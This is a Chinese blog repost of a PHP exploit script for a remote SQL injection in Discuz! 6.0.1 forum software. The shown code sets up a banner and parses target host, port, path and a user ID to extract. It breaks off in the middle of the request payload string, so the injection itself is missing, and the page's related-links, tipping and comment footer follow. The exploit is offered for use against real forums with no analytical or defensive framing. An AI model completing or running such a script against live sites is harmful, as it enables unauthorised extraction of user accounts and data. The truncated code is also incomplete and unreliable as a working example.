Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit

网络 PHP

本文整理自网络,侵删。

<?php
error_reporting(E_ALL&E_NOTICE);
print_r("
------------------------------------------------------------------
Exploit discuz6.0.1
Just work as php>=5 & mysql>=4.1
BY james
------------------------------------------------------------------
");

if($argc>4)
{
$host=$argv[1];
$port=$argv[2];
$path=$argv[3];
$uid=$argv[4];
}else{
echo "Usage: php ".$argv[0]." host port path uid\n";
echo "host: target server \n";
echo "port: the web port, usually 80\n";
echo "path: path to discuz\n";
echo "uid : user ID you wanna get\n";
echo "Example:\r\n";
echo "php ".$argv[0]." localhost 80 1\n";
exit;
}

$content ="action=search&searchid=22

更多关于Discuz论坛内容来自木庄网络博客


标签:Discuz论坛

相关阅读 >>

win2008 r2 下 iis7.5+php5.2.17+mysql5.5.16+zend3.3.3

discuz!开启使用html、主题分类、分类信息的方法

discuz x2.0 diy页面调用分类信息的实现方法

discuz! x2.5定时发帖新功能开启方法(图文)

Discuz论坛发帖技巧分享

微信公众平台开发入门教程(sae方倍工作室)

脚本安全的本质_php+mysql第33页

如何注册网站 新人注册网站图文步骤

论坛常用的几个推广方法分享

python的常见命令注入威胁

更多相关阅读请进入《Discuz论坛》频道 >>



标签:

打赏

取消

感谢您的支持,我会继续努力的!

扫码支持
扫码打赏,您说多少就多少

打开支付宝扫一扫,即可进行扫码打赏哦

分享从这里开始,精彩与您同在

相关推荐

评论

管理员已关闭评论功能...